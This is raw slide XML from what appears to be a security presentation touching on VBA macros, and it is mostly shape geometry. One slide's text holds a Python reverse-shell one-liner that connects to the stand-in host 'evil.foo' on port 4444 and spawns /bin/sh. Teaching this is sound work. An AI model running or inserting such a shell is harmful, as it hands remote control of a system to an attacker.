            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5735320" h="2679700">
                  <a:moveTo>
                    <a:pt x="0" y="2679192"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="5734812" y="2679192"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5734812" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="2679192"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="952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367654" y="3888104"/>
            <a:ext cx="5511800" cy="216662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55"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s=socket.socket(socket.AF_INET,socke </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-1190">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>t.SOCK_STREAM)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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>s.connect(("evil.foo",4444))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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os.dup2(s.fileno(),0)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2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os.dup2(s.fileno(),1)</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="2291080">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-5">
                <a:latin typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
              </a:rPr>
              <a:t>os.dup2(s.fileno(),2)  pty.spawn("/bin/sh")'</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:latin typeface="Courier New"/>
              <a:cs typeface="Courier New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230367" y="3387813"/>
            <a:ext cx="5873750" cy="3039110"/>
            <a:chOff x="5230367" y="3387813"/>
            <a:chExt cx="5873750" cy="303911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30367" y="3387813"/>
              <a:ext cx="5873495" cy="41304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276087" y="3433571"/>
              <a:ext cx="5759450" cy="299085"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5759450" h="299085">
                  <a:moveTo>
                    <a:pt x="5677154" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="82041" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50095" y="6443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="24018" y="24018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="6443" y="50095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="82041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="298703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5759195" y="298703"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5759195" y="82041"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5752752" y="50095"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5735177" y="24018"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5709100" y="6443"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5677154" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5496D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30367" y="6245300"/>
              <a:ext cx="5873495" cy="18127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276087" y="6291071"/>
              <a:ext cx="5759450" cy="67310"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="5759450" h="67310">
                  <a:moveTo>
                    <a:pt x="5759196" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="67055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5759196" y="67055"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5759196" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="5396D3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1073" y="306451"/>
            <a:ext cx="8217534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55">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Macros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5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dirty="0" spc="-5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30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Visual</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> Basic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10">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Applications</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-3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(VBA)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4120" y="760476"/>
            <a:ext cx="11268455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64739" y="1882292"/>
            <a:ext cx="11750675" cy="796925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Macros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record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steps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taken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office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productivity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application.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These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coded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scripting</a:t>
            </a:r>
            <a:endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="231775">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="395"/>
              </a:spcBef>
            </a:pP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language.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Some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examples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are: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639556" y="3865879"/>
            <a:ext cx="3992879" cy="3937000"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="831316" y="1371600"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="682498" y="1371600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="721356" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756380" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="787546" y="1409700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="837168" y="1447800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="862695" y="1511300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="865886" y="1536700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="864213" y="1562100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="847993" y="1612900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="831551" y="1651000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="808291" y="1689100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="777268" y="1727200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="737533" y="1790700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="688140" y="1841500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="628142" y="1917700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="465074" y="2095500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="421650" y="2146300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379644" y="2197100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339054" y="2235200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="299879" y="2286000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="262120" y="2324100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="225774" y="2362200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="190841" y="2400300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="157320" y="2438400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125210" y="2476500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="94510" y="2501900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="65219" y="2527300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37338" y="2565400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="26427" y="2578100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="19018" y="2590800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14799" y="2603500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13462" y="2616200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="13462" y="2946400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="14692" y="2959100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18160" y="2971800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23534" y="2971800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="30479" y="2984500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="38762" y="2997200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="59233" y="2997200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71374" y="3009900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="689355" y="3009900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2108454" y="3886200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2149965" y="3898900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2192989" y="3924300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2237329" y="3937000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2420042" y="3937000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556764" y="3898900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2271710" y="3898900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2184146" y="3873500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2142490" y="3848100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="716534" y="2959100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71374" y="2959100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71374" y="2616200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="77977" y="2616200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105171" y="2578100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134022" y="2552700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="164496" y="2514600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="196558" y="2489200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="230172" y="2451100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="265302" y="2413000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="301915" y="2374900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="339974" y="2336800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="379444" y="2286000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="420290" y="2247900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="462476" y="2197100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="505968" y="2146300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="665479" y="1968500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="713744" y="1905000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="756759" y="1854200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="794565" y="1803400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="827202" y="1765300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="854709" y="1714500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="877127" y="1676400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="894493" y="1638300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="906849" y="1612900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="914233" y="1574800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="916686" y="1549400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="912304" y="1498600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="899350" y="1460500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="878109" y="1422400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="848868" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="831316" y="1371600"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="2535907" y="50800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="2409406" y="50800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2495583" y="76200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751834" y="863600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3790762" y="889000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3825948" y="914400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3857168" y="952500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884199" y="990600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3906817" y="1028700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3924798" y="1079500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937919" y="1117600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3945955" y="1168400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3948684" y="1219200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3948684" y="2730500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3945955" y="2781300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3937919" y="2819400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3924798" y="2870200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3906817" y="2921000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3884199" y="2959100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3857168" y="2997200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3825948" y="3035300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3790762" y="3060700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3751834" y="3086100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2536190" y="3848100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2494533" y="3873500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2406969" y="3898900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2556764" y="3898900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772154" y="3136900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3811355" y="3111500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847291" y="3086100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3879758" y="3048000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908554" y="3009900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3933475" y="2971800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3954320" y="2921000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3970886" y="2882900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3982969" y="2832100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3990368" y="2781300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3992879" y="2730500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3992879" y="1219200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3990368" y="1181100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3982969" y="1130300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3970886" y="1079500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3954320" y="1028700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3933475" y="990600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3908554" y="952500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3879758" y="901700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3847291" y="876300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3811355" y="838200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="3772154" y="812800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2535907" y="50800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="1347946" y="2590800"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="625570" y="2590800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="635019" y="2603500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1340369" y="2603500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1347946" y="2590800"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="997539" y="977900"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="788929" y="977900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839019" y="990600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="887025" y="1003300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="932947" y="1016000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="976785" y="1028700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1018540" y="1054100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1064172" y="1079500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1105897" y="1104900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1143825" y="1143000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1178070" y="1181100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1208746" y="1219200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1235964" y="1257300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1259134" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1277902" y="1346200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1292352" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302568" y="1435100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1308636" y="1485900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1310640" y="1536700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1308597" y="1587500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1302471" y="1625600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1292260" y="1676400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1277965" y="1714500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1259586" y="1765300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1239762" y="1803400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1217497" y="1841500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1192593" y="1892300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1164853" y="1930400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1134079" y="1968500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1100074" y="2019300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1070408" y="2057400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1038622" y="2095500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1005031" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="969952" y="2171700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="933703" y="2209800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="904790" y="2235200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="873268" y="2273300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="839018" y="2311400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="801920" y="2349500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="761854" y="2387600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="718700" y="2438400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="672338" y="2476500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="617982" y="2540000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611659" y="2540000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="608171" y="2552700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="607873" y="2565400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="611124" y="2578100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="617406" y="2590800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352998" y="2590800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1354836" y="2578100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1352998" y="2565400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1347946" y="2552700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="682498" y="2552700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="706120" y="2527300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="752749" y="2476500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="836948" y="2387600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="874420" y="2349500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="908742" y="2311400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="939865" y="2286000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="967740" y="2247900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1003917" y="2209800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1039168" y="2171700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1073298" y="2133600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1106111" y="2095500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1137412" y="2044700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1173071" y="2006600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1205436" y="1955800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1234598" y="1917700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1260649" y="1879600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1283679" y="1828800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1303782" y="1790700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1324116" y="1739900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1340207" y="1689100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1351897" y="1638300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1359028" y="1587500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1361440" y="1536700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1359776" y="1485900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1354784" y="1447800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1346464" y="1397000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1334816" y="1346200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1319841" y="1308100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1301537" y="1270000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1279905" y="1219200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1255060" y="1181100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1226980" y="1143000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1195790" y="1117600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1161614" y="1079500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1124577" y="1054100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1084802" y="1028700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1042416" y="1003300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="997539" y="977900"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="477258" y="1663700"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="25261" y="1663700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="34766" y="1676400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="467677" y="1676400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="477258" y="1663700"/>
                </a:lnTo>
                <a:close/>
              </a:path>
              <a:path w="3992879" h="3937000">
                <a:moveTo>
                  <a:pt x="849136" y="927100"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="531195" y="927100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="483518" y="939800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="392729" y="965200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="349758" y="977900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="300524" y="1003300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="254677" y="1028700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="212217" y="1066800"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="173143" y="1092200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="137456" y="1130300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="105155" y="1168400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="76676" y="1219200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="52323" y="1257300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="32289" y="1308100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="16763" y="1358900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5937" y="1422400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1473200"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1612900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="1230" y="1625600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4699" y="1638300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10072" y="1651000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17018" y="1663700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="485648" y="1663700"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="492553" y="1651000"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="497840" y="1638300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="501221" y="1625600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51053" y="1625600"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51053" y="1485900"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56609" y="1435100"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="66538" y="1384300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="80645" y="1333500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="98730" y="1295400"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120598" y="1257300"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="146050" y="1219200"/>
                </a:lnTo>
                <a:lnTo>
